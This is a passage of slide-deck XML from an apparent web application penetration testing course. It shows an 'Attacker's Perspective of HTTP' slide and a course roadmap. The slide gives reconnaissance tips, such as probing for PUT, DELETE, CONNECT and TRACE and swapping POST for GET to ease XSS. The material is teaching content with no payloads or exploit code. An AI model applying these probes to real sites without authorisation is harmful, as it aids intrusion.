              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="6781800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look for methods that shouldn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t be supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PUT, DELETE, CONNECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE helps map the architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Check for method interchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application may support making GET requests where it typically uses POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many applications do this, especially older or poorly coded PHP apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Eases XSS attacks and scripting because all parameters can be passed right on the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>GET requests tend to be simpler than POST requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50180" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="6019800"/>
            <a:ext cx="800100" cy="269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Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="1830388"/>
            <a:ext cx="1600200" cy="912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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>My app is designed to accept parameters via HTTP POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50182" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7772400" y="3568700"/>
            <a:ext cx="1041400" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50183" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="4267200"/>
            <a:ext cx="1066800" cy="1525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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Let's try</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>a request that sends parameters to the app via HTTP GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50184" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="3833813"/>
            <a:ext cx="501650" cy="1347787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 158361 w 501485"/>
              <a:gd name="T1" fmla="*/ 1314241 h 1348240"/>
              <a:gd name="T2" fmla="*/ 5872 w 501485"/>
              <a:gd name="T3" fmla="*/ 645038 h 1348240"/>
              <a:gd name="T4" fmla="*/ 193549 w 501485"/>
              <a:gd name="T5" fmla="*/ 9307 h 1348240"/>
              <a:gd name="T6" fmla="*/ 486810 w 501485"/>
              <a:gd name="T7" fmla="*/ 589274 h 1348240"/>
              <a:gd name="T8" fmla="*/ 357775 w 501485"/>
              <a:gd name="T9" fmla="*/ 1303089 h 1348240"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 501485"/>
              <a:gd name="T16" fmla="*/ 0 h 1348240"/>
              <a:gd name="T17" fmla="*/ 501485 w 501485"/>
              <a:gd name="T18" fmla="*/ 1348240 h 1348240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="501485" h="1348240">
                <a:moveTo>
                  <a:pt x="154449" y="1348240"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="77224" y="1116540"/>
                  <a:pt x="0" y="884841"/>
                  <a:pt x="5720" y="661724"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11440" y="438607"/>
                  <a:pt x="110594" y="19070"/>
                  <a:pt x="188772" y="9535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266950" y="0"/>
                  <a:pt x="448095" y="383305"/>
                  <a:pt x="474790" y="604515"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="501485" y="825726"/>
                  <a:pt x="348942" y="1336798"/>
                  <a:pt x="348942" y="1336798"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50185"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2743200"/>
            <a:ext cx="609600" cy="871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0186"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5181600"/>
            <a:ext cx="609600" cy="871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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
